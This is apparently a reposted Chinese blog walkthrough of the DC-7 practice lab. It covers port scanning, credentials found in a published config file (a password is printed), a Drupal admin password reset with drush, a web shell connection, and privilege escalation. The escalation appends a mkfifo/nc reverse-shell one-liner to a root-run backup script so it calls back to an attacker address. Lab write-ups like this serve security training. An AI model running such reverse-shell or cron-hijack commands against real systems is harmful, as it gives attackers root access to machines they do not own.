DC-7
上線自帶ip
打開目標網頁
nmap掃一下
查看網站子目錄,沒有發現有用目錄
百度搜索@DC7USER
都看看,發現組態檔中有服務器的賬號密碼
獲得資料庫賬號密碼,試一下剛才掃出來的22埠能否登陸
$用戶名= "dc7user";
$密碼= " MdR3xOgB7#dW ";
$dbname = "Staff";
$conn = mysqli_connect($服務器名, $用戶名, $密碼, $dbname);
成功登陸
查看當前檔案,提示有一份新郵件在那個目錄:
巨長一篇, 翻譯看不懂,放棄
進入網站根目錄,修改網站管理員密碼
drush user-password admin --password=“123456”
嘗試登陸
找啊找
需要安裝php插件才能寫入PHP
給服務器安裝php插件安裝成功后開始嘗試連接蟻劍
Python –c ‘import pty;pty.spawn(“/bin/bash”)’ 回顯
發現不是root,進行提權
將以下命令追加至/opt/scripts/backups.sh檔案中
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.xxx.xxx 1111>/tmp/f
等待很久,,,才能上線,上線后為root權限
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/231342.html
標籤:其他
下一篇:weevely 常用命令講解